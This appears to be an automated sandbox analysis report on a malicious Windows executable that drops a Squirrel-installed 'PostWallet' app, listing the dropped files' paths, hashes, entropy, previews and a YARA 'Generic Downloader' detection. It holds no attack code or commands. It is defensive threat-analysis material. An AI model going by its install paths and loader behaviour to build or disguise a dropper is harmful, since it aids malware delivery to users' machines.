                                                  Preview:L..................F.... ....W..W.......-;...W..W...8............................P.O. .:i.....+00.../C:\.....................1......T.t..PROGRA~1..t.......C.l.T.t....................J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....d.1.....GVs...CLASSI~1..L......oQb.GVs.............................|.C.l.a.s.s.i.c. .S.h.e.l.l.....v.2.8....L. .CL4DF7~1.EXE..Z.......L.GVs......p........................C.l.a.s.s.i.c.S.t.a.r.t.M.e.n.u...e.x.e.......b...............-.......a....................C:\Program Files\Classic Shell\ClassicStartMenu.exe..+.E.d.i.t. .t.h.e. .s.e.t.t.i.n.g.s. .o.f. .t.h.e. .c.l.a.s.s.i.c. .s.t.a.r.t. .m.e.n.u.....\.C.l.a.s.s.i.c.S.t.a.r.t.M.e.n.u...e.x.e...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.l.a.s.s.i.c. .S.h.e.l.l.\...-.s.e.t.t.i.n.g.s.........&................c^...NI..e.2.......`.......X.......developer.........;.3L..,.{b..D...&...S..2.jA..;.3L..,.{b..D...&...S..2.jAO...........1SPS.....Oh.....+'..i............,...E.d.i.t. .t.
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Sun Jul 15 15:15:34 2018, mtime=Tue Feb 7 18:51:36 2023, atime=Sun Jul 15 15:15:34 2018, length=163640, window=hide
                                                  Category:dropped
                                                  Size (bytes):2170
                                                  Entropy (8bit):3.6314833200420304
                                                  Encrypted:false
                                                  SSDEEP:48:8RiRud/P67xMpYuyUxM/qdk3H5XdtleMS+kWXdtle6by7fxMfe:8Ri/76yuyU6/535Xdtle7WXdtle6byrV
                                                  MD5:D69C9EBBCD7BAFC825E102C152CACECA
                                                  SHA1:343E647AD0464050384EB4243F08C0352B199B7C
                                                  SHA-256:F9F870340594D16E15E8E861E3C9D9277737014BB9B66B17BEA76EF722150612
                                                  SHA-512:198DA4A6C8FD70739B58D6E028391EA9B0A43DAB0488E12AB72C825175634F49E8DA07C6112FD084A52187AA405C16D6BCDFA340F08D3F16825FF700198F16B8
                                                  Malicious:false
                                                  Preview:L..................F.@.. ....W..W.......-;...W..W...8............................P.O. .:i.....+00.../C:\.....................1......T.t..PROGRA~1..t.......C.l.T.t....................J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....d.1.....GVs...CLASSI~1..L......oQb.GVs............................py.C.l.a.s.s.i.c. .S.h.e.l.l.....v.2.8....L. .CL4DF7~1.EXE..Z.......L.GVs......p........................C.l.a.s.s.i.c.S.t.a.r.t.M.e.n.u...e.x.e.......b...............-.......a....................C:\Program Files\Classic Shell\ClassicStartMenu.exe....O.p.e.n. .t.h.e. .S.t.a.r.t. .s.c.r.e.e.n.....\.C.l.a.s.s.i.c.S.t.a.r.t.M.e.n.u...e.x.e...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.l.a.s.s.i.c. .S.h.e.l.l.\...-.t.o.g.g.l.e.n.e.w.K.C.:.\.W.i.n.d.o.w.s.\.I.n.s.t.a.l.l.e.r.\.{.C.A.B.C.E.5.7.3.-.0.A.8.6.-.4.2.F.A.-.A.5.2.A.-.C.7.E.A.6.1.D.5.B.E.0.8.}.\.S.t.a.r.t.S.c.r.e.e.n...e.x.e.........%SystemRoot%\Installer\{CABCE573-0A86-42FA-A52A-C7EA61D5BE08}\StartScreen.exe......
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):12504
                                                  Entropy (8bit):3.9901492106201517
                                                  Encrypted:false
                                                  SSDEEP:96:rWmJbnrYb2RmqnrOmx42nrsWmq+nrmGhmPk+nr/Ymt/nrUYmQmnrBBmkdnrw1Jms:LAb2hgdKV0RSTx2yY3cQgYdlQzvDp
                                                  MD5:8F13BF2F1F487B6B4B1580322C95B1E9
                                                  SHA1:7ACF79E62409413F83EA6A86B8672CDA9A92F81D
                                                  SHA-256:E082504EB91D7E5ED60F5A6B7866C77349C566D7185F167D24AD022E02E83C2C
                                                  SHA-512:49BD5E70912CA70326460B6223A4257E5658A445135E446B49616F903CFB685086BCD606B16A4F17D18849F91D1726FC904237E6663AACF55EA47530347E0BAC
                                                  Malicious:false
                                                  Preview:..[.a.r.-.S.A.]. .-. .A.r.a.b.i.c. .(.S.a.u.d.i. .A.r.a.b.i.a.).....M.e.n.u...P.i.n.S.t.a.r.t.C.s. .=. .*.+.(.J.*. .(.'.D.B.'.&.E.). .".'.(./.#."... .(.C.l.a.s.s.i.c. .S.h.e.l.l.).....M.e.n.u...U.n.p.i.n.S.t.a.r.t.C.s. .=. .%.2.'.D.). .'.D.*.+.(.J.*. .E.F. .'.D.B.'.&.E.). .".'.(./.#.". .(.C.l.a.s.s.i.c. .S.h.e.l.l.).........[.b.g.-.B.G.]. .-. .B.u.l.g.a.r.i.a.n. .(.B.u.l.g.a.r.i.a.).....M.e.n.u...P.i.n.S.t.a.r.t.C.s. .=. ...0.:.0.G.8. .:.J.<. .<.5.=.N.B.>. .".!.B.0.@.B.". .(.C.l.a.s.s.i.c. .S.h.e.l.l.).....M.e.n.u...U.n.p.i.n.S.t.a.r.t.C.s. .=. ...B.:.0.G.8. .>.B. .<.5.=.N.B.>. .".!.B.0.@.B.". .(.C.l.a.s.s.i.c. .S.h.e.l.l.).........[.c.a.-.E.S.]. .-. .C.a.t.a.l.a.n. .(.C.a.t.a.l.a.n.).....M.e.n.u...P.i.n.S.t.a.r.t.C.s. .=. .A.n.c.o.r.a.r. .a.l. .M.e.n... .I.n.i.c.i.a. .(.C.l.a.s.s.i.c. .S.h.e.l.l.).....M.e.n.u...U.n.p.i.n.S.t.a.r.t.C.s. .=. .D.e.s.a.n.c.o.r.a.r. .d.e.l. .M.e.n... .I.n.i.c.i.a. .(.C.l.a.s.s.i.c. .S.h.e.l.l.).........[.c.s.-.C.Z.]. .-. .C.z.e.c.h. .(.C.z.e.c.h. .R.e.p.u.
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):299541
                                                  Entropy (8bit):6.022905306278769
                                                  Encrypted:false
                                                  SSDEEP:6144:TcR7D2COBeKWVDRfULSUMe2xoWZYvkT+ALfmm0T:TcR7D2COBedDRfnxxoRALfmma
                                                  MD5:B53021BC0D4329A1567FAFF97CDB624A
                                                  SHA1:2B2F8D5147011EB1174D9D7268F1838E7D71875F
                                                  SHA-256:8B56C1A8881F34AD52E6530BECB21BE691CB6739472BEFA06835987B6602D9E3
                                                  SHA-512:A262769074CCB5909188F28AFD0473BE7A0C1DAC905424FCE6B6E7850003ED0388CE718872010DD64A67B2B488C96E6F69CECB690851FA113776347ABCF9BEB7
                                                  Malicious:false
                                                  Preview:.; This file contains all localized text for Classic Start Menu. There is one section per language...; Every section contains text lines in the form of <key> = <string>...; Which section is used depends on the current OS setting. If a key is missing from the language section..; it will be searched in the [default] section. In some cases more than one language can be used...; For example a Japanese system may use English as a secondary language. In that case the search order..; will be [ja-JP] -> [en-US] -> [default]...;..; =============================================================================......[default]..Menu.ClassicSettings = Classic Start &Menu..Menu.SettingsTip = Settings for Classic Start Menu......[ar-SA] - Arabic (Saudi Arabia)..Menu.Programs = .....&....Menu.Apps = ...........Menu.AllPrograms = .... .........Menu.Back = .......Menu.Favorites = ....&.....Menu.Documents = ......&.....Menu.Settings = .&........Menu
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):142
                                                  Entropy (8bit):6.55447018279355
                                                  Encrypted:false
                                                  SSDEEP:3:DfVjzD2ZzXgE4dXC/FiYvyfgaPDlZqLDpVYngGbu/6Ry0s9rYdn:hnDEgRdSZEg8YDp1ERy0OAn
                                                  MD5:57A37BD0840D0745A9481BCC25B5A792
                                                  SHA1:E8B7C744981C0713DE5EBB308897EFCBD374FD11
                                                  SHA-256:E2B2371F95D8D9CBFCA301AFF3441466E30453BBD37A42FA17DAF4D85AA7E627
                                                  SHA-512:08AFA751874B49FB20ADBEC0C824609DAE0DECD6E747471EF8CB19FAE299A65D21ACC02185560669ED9E36CD74E2E4372B61E52EEF34D5785E9BBA3DC8FD431B
                                                  Malicious:false
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):7426462
                                                  Entropy (8bit):7.999967301550424
                                                  Encrypted:true
                                                  SSDEEP:196608:Tk3prU7StZ/Bfn+O4dyfXQts5CrdMAAbXLdJipAwHKMObs:IprU7Sfn+ORXSHrXAbbiWwHK5I
                                                  MD5:B952A1B57AAE836929B07EE6B6306C61
                                                  SHA1:F6DF9A789D409F73BF9014F0242E3E503FF2293F
                                                  SHA-256:C0D96E4CB03FC72E8357B9095AE0F5160C1699E0470E671E46B12719E70E5665
                                                  SHA-512:6D05C2FCC34784FD2567EE507A0E0554EFD56777131552F37FAD84EBCDDDB937B89A5C4EC4BED4489729E92AC2C7B1F90EF8B18F9CE4EE18979FE2D7C91941B2
                                                  Malicious:false
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                  Category:dropped
                                                  Size (bytes):7426462
                                                  Entropy (8bit):7.995761675737067
                                                  Encrypted:true
                                                  SSDEEP:196608:JbvMh/4SWhJe4nsHikPK4sNYN+i4AypzpmOTu/o+TShcj11G:6GJsH2S5LyNBCw17
                                                  MD5:947298F38A0962D59A2B735BE4A3DB32
                                                  SHA1:5910D9D2A47523C29CD3ACEA6D10C95DD3625BF2
                                                  SHA-256:CA66B4329B1AFA52827C01A1920859D63B13C2793AF671C2A03FE527895F7B5E
                                                  SHA-512:88327153BD9C15BE968E7DB67429225B79D048008F505A2734DFA976F725873A06AF6052E8564C3484DE6F521CF42090C54C922573D1EE30342260EF24B53000
                                                  Malicious:false
                                                  Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):2751
                                                  Entropy (8bit):5.372322730968244
                                                  Encrypted:false
                                                  SSDEEP:48:MxHKQwYHKGSI6ouHlJH/lEHuFKHKS+AHKKk7O6HFHKp1qHGIsCtHTHNHkbEHKxHO:iqbYqGSI6ou/fmOYqSJqKk7jlqpwmjCX
                                                  MD5:E186D8CCFA77C108F5C38908EF87820C
                                                  SHA1:47495A5AE5BE859D96CD2C2BD276A4B9A8B441C0
                                                  SHA-256:E2CDF4184CFAFC04DCEB16A3AB1826DBB566B677590B5852A74411BA8B308142
                                                  SHA-512:4173349453148C359F9E0DD698D7C8142A3198BD327722A3D5D5BD1C19F9695EFE732DB3769FB938FF3705AA3CC35A90EDFF2B2ED6F08F2901E376C6A3A1EE5E
                                                  Malicious:false
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\WindowsBase\95a5c1baa004b986366d34856f0a5a75\WindowsBase.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore\ef4e808cb158d79ab9a2b049f8fab733\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f#\
                                                  Process:C:\Windows\System32\rundll32.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):7426462
                                                  Entropy (8bit):7.999967301550424
                                                  Encrypted:true
                                                  SSDEEP:196608:Tk3prU7StZ/Bfn+O4dyfXQts5CrdMAAbXLdJipAwHKMObs:IprU7Sfn+ORXSHrXAbbiWwHK5I
                                                  MD5:B952A1B57AAE836929B07EE6B6306C61
                                                  SHA1:F6DF9A789D409F73BF9014F0242E3E503FF2293F
                                                  SHA-256:C0D96E4CB03FC72E8357B9095AE0F5160C1699E0470E671E46B12719E70E5665
                                                  SHA-512:6D05C2FCC34784FD2567EE507A0E0554EFD56777131552F37FAD84EBCDDDB937B89A5C4EC4BED4489729E92AC2C7B1F90EF8B18F9CE4EE18979FE2D7C91941B2
                                                  Malicious:false
                                                  Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1899520
                                                  Entropy (8bit):5.894883178349122
                                                  Encrypted:false
                                                  SSDEEP:24576:pWltPuAnUCiag6CKM2zCy9sQuOjj1VgZej6GeS4lNrCze5qhYp4t9m2:0t3UCiag6CKM2zCyZuOjJaxSS5qh
                                                  MD5:A560BAD9E373EA5223792D60BEDE2B13
                                                  SHA1:82A0DA9B52741D8994F28AD9ED6CBD3E6D3538FA
                                                  SHA-256:76359CD4B0349A83337B941332AD042C90351C2BB0A4628307740324C97984CC
                                                  SHA-512:58A1B4E1580273E1E5021DD2309B1841767D2A4BE76AB4A7D4FF11B53FA9DE068F6DA67BF0DCCFB19B4C91351387C0E6E200A2A864EC3FA737A1CB0970C8242C
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\PostWallet\Update.exe, Author: Joe Security
                                                  Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):89392
                                                  Entropy (8bit):6.732128875673087
                                                  Encrypted:false
                                                  SSDEEP:1536:dXkQyiMoenxFAyL79+olDm4Wj7zKRvJQIRb41PxHM73cP0d:dXkQyXpnQm+EU7zKRvJQIRb0xHMDcP0d
                                                  MD5:436CEDFA08F245AD52DD221BEC4480A4
                                                  SHA1:BDCD2A73AA4AA4C10B3BBCCEA75397CB36E5D058
                                                  SHA-256:2ADC7AEEAC540D9DED381D10C24F35A428EAA1298829262F11D1B0BB7AB0F24B
                                                  SHA-512:4FF805500006E6E794690E4D67417669A6811206C5A1686F751759B4875A8302D6094C877ECF61A6BE11EE00B87B69C79FEE9CE444EE9F7300074E2CF646D802
                                                  Malicious:true
                                                  Process:C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):5331456
                                                  Entropy (8bit):5.9835196660480054
                                                  Encrypted:false
                                                  SSDEEP:49152:EUphtTpuejnW6Zcpt2UZYCnaSz6lc/FkAdOj1v62Vn032TEB6sic:EMK6ZYt3WZzUF/ic
                                                  MD5:430EC455D28552750521DC74B7C60BE8
                                                  SHA1:1C10314F5A5E2DF5E61F3DF07863BFF5CAB77DBC
                                                  SHA-256:9E39F499B0F494B7C3221F47A576F5C89D769570C64D92ACA332F5A7E4F6243C
                                                  SHA-512:3D07C7B6F1F05726A16D378601FF6709BE88831C92644772327890A20039E170770C333E746EBD293B13FA1B788281852BC2B77B506896B48C113BB5203E8B74
                                                  Malicious:true
                                                  Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):5331456
                                                  Entropy (8bit):7.999969837632621
                                                  Encrypted:true
                                                  SSDEEP:98304:n0KviiPecd1Muk3g6WKv+808OAInI7hkeQpydfHH7V74mfRk6mttTGkZIfzP8w4:Zv3Pecdiuk3g6WKK7ChUydfn7VsmJMDh
                                                  MD5:B4DAC714A14BF703C5F62CEF9250B08E
                                                  SHA1:FBCA927E808E9BFB03DD4D18F8D7976DF45C1CA8
                                                  SHA-256:083879DC3088B58AF59F1E9CF3A6AE970E8CF8399CA09988D280E6BFDF44C40B
                                                  SHA-512:834C561FB7B11DE8BB3C6D4A25410F00D4B5C265C602D8A734C16108913D4E3CD4FD01A47854845F180555936153B63E635DFFF05BEF1B5534916F073943CD74
                                                  Malicious:false
                                                  Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):80800
                                                  Entropy (8bit):6.781496286846518
                                                  Encrypted:false
                                                  SSDEEP:1536:FRk1rh/be3Z1bij+8xG+sQxzQF50I9VSHIecbWZOUXYOe0/zuvY:FRk/+Z1z8s+s+QrTmIecbWIA7//gY
                                                  MD5:1E6E97D60D411A2DEE8964D3D05ADB15
                                                  SHA1:0A2FE6EC6B6675C44998C282DBB1CD8787612FAF
                                                  SHA-256:8598940E498271B542F2C04998626AA680F2172D0FF4F8DBD4FFEC1A196540F9
                                                  SHA-512:3F7D79079C57786051A2F7FACFB1046188049E831F12B549609A8F152664678EE35AD54D1FFF4447428B6F76BEA1C7CA88FA96AAB395A560C6EC598344FCC7FA
                                                  Malicious:true
                                                  Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):577024
                                                  Entropy (8bit):6.751558391430317
                                                  Encrypted:false
                                                  SSDEEP:12288:cjR3E7WHbd+OeO+OeNhBBhhBBwOqqVg4MB2l1tWmmmXEstgE61IsEjIA:83DbDOtdMB2Wgg51IsEj7
                                                  MD5:534D947D95726726B8EB8E9FAC82483E
                                                  SHA1:1745FA80DF5D86E5F077914DED73F581B368ACCF
                                                  SHA-256:EC5EF035F0148CAACCC6A2A81657BA67612DC3E521646ED1F65F56712D77F03C
                                                  SHA-512:149C0EFC39E1FA4B43BE1642DF6D1B0954AF41F0A9AE992A2E55D7660248F265A90DD17268A33072A441BA59119EEC6D9B94607603F115BFF04F3E2F0CC82BD2
                                                  Malicious:true
                                                  Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                  Category:dropped
                                                  Size (bytes):5669931
                                                  Entropy (8bit):7.999965927440836
                                                  Encrypted:true
                                                  SSDEEP:98304:c0KviiPecd1Muk3g6WKv+808OAInI7hkeQpydfHH7V74mfRk6mttTGkZIfzP8wHM:Qv3Pecdiuk3g6WKK7ChUydfn7VsmJMDV
                                                  MD5:0F0E96F3DA3D605C7A73D88B2ECE8CD0
                                                  SHA1:4060A13252162CD46DAF3ED52E477A4BA8DE70C1
                                                  SHA-256:8D94AA447236A4CB95E69FE93CB94A8AFF388334BA493CC70DBC26D058350C6C
                                                  SHA-512:B5E6F27976A25B333FAD13ADAF2F571D08BCD14F2ADB5DA71A62893C259191CF6B51EE2876A95311A1196E2F43288BE9285A27B2F82D6980B58DA8B5289621D2
                                                  Malicious:false
                                                  Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                  File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):79
                                                  Entropy (8bit):4.9037382300235866
                                                  Encrypted:false
                                                  SSDEEP:3:mOQ8mzcGw0BgVPKWdHYhJxrGEtTn:m/zcGbB4FdgjGEdn
                                                  MD5:535A03DF0527BA001F69A849F2495975
                                                  SHA1:0E7B27A6FA9B14262C1C4BEB82E7367A12C03BC9
                                                  SHA-256:0EEE2ABD684BC67E6FA1026229B92F3B4C11168D8286200B2DE85AC196417929
                                                  SHA-512:8DC13CB44E032A5AF4E23393B26C50193DFC1C8FF4F90B0EEC915CA4867770A5A54170E52F6587189C2FB8FC10226BD008CF0F443E4507C8901C4983CBC74130
                                                  Malicious:false
                                                  Preview:.4060A13252162CD46DAF3ED52E477A4BA8DE70C1 PostWallet-1.0.0-full.nupkg 5669931
                                                  Process:C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exe
                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                  Category:dropped
                                                  Size (bytes):5669931
                                                  Entropy (8bit):7.999965927440836
                                                  Encrypted:true
                                                  SSDEEP:98304:c0KviiPecd1Muk3g6WKv+808OAInI7hkeQpydfHH7V74mfRk6mttTGkZIfzP8wHM:Qv3Pecdiuk3g6WKK7ChUydfn7VsmJMDV
                                                  MD5:0F0E96F3DA3D605C7A73D88B2ECE8CD0
                                                  SHA1:4060A13252162CD46DAF3ED52E477A4BA8DE70C1
                                                  SHA-256:8D94AA447236A4CB95E69FE93CB94A8AFF388334BA493CC70DBC26D058350C6C
                                                  SHA-512:B5E6F27976A25B333FAD13ADAF2F571D08BCD14F2ADB5DA71A62893C259191CF6B51EE2876A95311A1196E2F43288BE9285A27B2F82D6980B58DA8B5289621D2
                                                  Malicious:false
                                                  Process:C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exe
                                                  File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):79
                                                  Entropy (8bit):4.9037382300235866
                                                  Encrypted:false
                                                  SSDEEP:3:mOQ8mzcGw0BgVPKWdHYhJxrGEtTn:m/zcGbB4FdgjGEdn
                                                  MD5:535A03DF0527BA001F69A849F2495975
                                                  SHA1:0E7B27A6FA9B14262C1C4BEB82E7367A12C03BC9
                                                  SHA-256:0EEE2ABD684BC67E6FA1026229B92F3B4C11168D8286200B2DE85AC196417929
                                                  SHA-512:8DC13CB44E032A5AF4E23393B26C50193DFC1C8FF4F90B0EEC915CA4867770A5A54170E52F6587189C2FB8FC10226BD008CF0F443E4507C8901C4983CBC74130
                                                  Malicious:false
                                                  Preview:.4060A13252162CD46DAF3ED52E477A4BA8DE70C1 PostWallet-1.0.0-full.nupkg 5669931
                                                  Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (367), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):2367
                                                  Entropy (8bit):5.319977614154781
                                                  Encrypted:false
                                                  SSDEEP:48:T/tHhLf3rLmGXbrk4VVu4ziTu4z4P4kZ6QuLKuRKEP4kZ6QjNRnDo3Er:TlqQvebrd
                                                  MD5:FCB3871871D99241515791FEBC962309
                                                  SHA1:0DE7FD059524324D1DA766E2797A2A3445D2268D
                                                  SHA-256:94E366D9D5A842159F21ED1758E66C38E824BD6D64B13890732170DF6C788052
                                                  SHA-512:3E03684E161D78D2A73628EF79280CCED9FAD6B7F08D6E52F2C2008B40FB529F529C251FC5ED3B4CE3FA3801B6A66699064EEFC6BFC68E5825D4B3CA51EF7183
                                                  Malicious:false
                                                  Preview:.[07/03/24 10:47:19] info: Program: Starting Squirrel Updater: --install . --rerunningWithoutUAC..[07/03/24 10:47:19] info: Program: Starting install, writing to C:\Users\user\AppData\Local\SquirrelTemp..[07/03/24 10:47:19] info: Program: About to install to: C:\Users\user\AppData\Local\PostWallet..[07/03/24 10:47:20] info: CheckForUpdateImpl: Reading RELEASES file from C:\Users\user\AppData\Local\SquirrelTemp..[07/03/24 10:47:20] info: CheckForUpdateImpl: First run, starting from scratch..[07/03/24 10:47:20] info: ApplyReleasesImpl: Writing files to app directory: C:\Users\user\AppData\Local\PostWallet\app-1.0.0..[07/03/24 10:47:20] info: ApplyReleasesImpl: Squirrel Enabled Apps: []..[07/03/24 10:47:20] warn: ApplyReleasesImpl: No apps are marked as Squirrel-aware! Going to run them all..[07/03/24 10:47:20] info: ApplyReleasesImpl: About to create shortcuts for FilePost.a.exe, rootAppDir C:\Users\user\AppData\Local\PostWallet..[07/03/24 10:47:20] info: ApplyReleasesImpl:
                                                  Process:C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1899520
                                                  Entropy (8bit):5.894883178349122
                                                  Encrypted:false
                                                  SSDEEP:24576:pWltPuAnUCiag6CKM2zCy9sQuOjj1VgZej6GeS4lNrCze5qhYp4t9m2:0t3UCiag6CKM2zCyZuOjJaxSS5qh
                                                  MD5:A560BAD9E373EA5223792D60BEDE2B13
                                                  SHA1:82A0DA9B52741D8994F28AD9ED6CBD3E6D3538FA
                                                  SHA-256:76359CD4B0349A83337B941332AD042C90351C2BB0A4628307740324C97984CC
                                                  SHA-512:58A1B4E1580273E1E5021DD2309B1841767D2A4BE76AB4A7D4FF11B53FA9DE068F6DA67BF0DCCFB19B4C91351387C0E6E200A2A864EC3FA737A1CB0970C8242C
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe, Author: Joe Security
                                                  Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                  File Type:ISO-8859 text, with CR line terminators
                                                  Category:dropped
                                                  Size (bytes):4
                                                  Entropy (8bit):2.0
                                                  Encrypted:false
                                                  SSDEEP:3:9:9
                                                  MD5:A7E0F8AC46398A7876D1E40DD52C2AAB
                                                  SHA1:B66922B4E6F09E23C072E4AFF49C67C3121DD5AF
                                                  SHA-256:05174BBF0D407087E45B12BAAE17117426852FF3A9E58D12A0EBB9A10B409743
                                                  SHA-512:E6B93215582F7F4F5E9292273A9466B5D0CC3A4EA7D77AE42854203755441DD5EDBEFB11FE8890CAE7783E41E2EDBF61EC7B03D7E5E9870A7821D4016B095F79
                                                  Malicious:false
                                                  Preview:....
                                                  Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                  File Type:MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has Working directory, Icon number=0, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
                                                  Category:dropped
                                                  Size (bytes):2144
                                                  Entropy (8bit):2.6875231559475488
                                                  Encrypted:false
                                                  SSDEEP:24:8DvaRHQJl+zqAP21q2O4Zfqqd5HAmqyA7ECtU:8uRHwl+zqAP0q2ZfqqrAjyA7EWU
                                                  MD5:DE72AC2E65EEEB469ABB3478E406A3E0
                                                  SHA1:63650F55594E26255B78FC40BDC400E631E2E023
                                                  SHA-256:412FAB2F1947C73DFE7B113A0C13D0949DFE23664F49996ABD1CB0029722E51C
                                                  SHA-512:CC570314877CAF50D55240EEE7C3EA7D795BD809F417A67AFE477583CDC71E80BA083FAFEB5CC5904DBB2CF3559AF61C31A837146CF849A65950D608DB4A4A2D
                                                  Malicious:false
                                                  Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                  File Type:MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has Working directory, Icon number=0, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
                                                  Category:dropped
                                                  Size (bytes):2130
                                                  Entropy (8bit):2.6865518206806787
                                                  Encrypted:false
                                                  SSDEEP:24:8DvaRHQJl+pqAP21q2O4Zfqqd5HAmqyA7ECtU:8uRHwl+pqAP0q2ZfqqrAjyA7EWU
                                                  MD5:08274D03823C1DB0BF257C6E1ECBAFEF
                                                  SHA1:7A7FEFCC30654A5AF2A3FC4EB6BACF6110E5B904
                                                  SHA-256:9FF427C6DAE1AFC2EF2C2A23B9E5D2482832C87C78A95CF80D497BEB88BBF29A
                                                  SHA-512:EA8F98F1CE09B95C33B2A900FF12C45B37498917AE8B03CAF59944F908C2FD524131616091AE596E7DFEF0B93D98FD4FF0F9379BFED72A6B9971D7D027B0EE7D
                                                  Malicious:false
                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Entropy (8bit):7.9945445565179565
                                                  TrID:
                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                  • DOS Executable Generic (2002/1) 0.02%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:00023948209303294#U00ac320302282349843984903.exe
                                                  File size:6'569'472 bytes
                                                  MD5:9e1e30202d950ce1f273eb2e8492f39b
                                                  SHA1:4d76edbdb6976aa2acbbe9c4264a6fc9176584ff
                                                  SHA256:ddef5168dd82c49304884fd4fb0720a865588dad07f1350ee2eba97cf15ee4c7
                                                  SHA512:25402db8233ae501a2c6a6646cb26414b90c6e996fb9b19702e08700a56c40550c01cae92332547ed58f821dd3a447613cc716f77542476bda13f9c9dab510d6
                                                  SSDEEP:196608:TrH3BZaqdwA8xEAQmoPOt20dr31XS658JTBPWb8QfiIq28O:Tr/DdAmAR3fdtS658JTBD/Z
                                                  TLSH:BF663321B794D035E0371A3369E875214C7F7EA1972064AB77C42B7E86300D68B7ABBD
                                                  Icon Hash:13170f6d2d6d6d33
                                                  Entrypoint:0x40ab5c
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
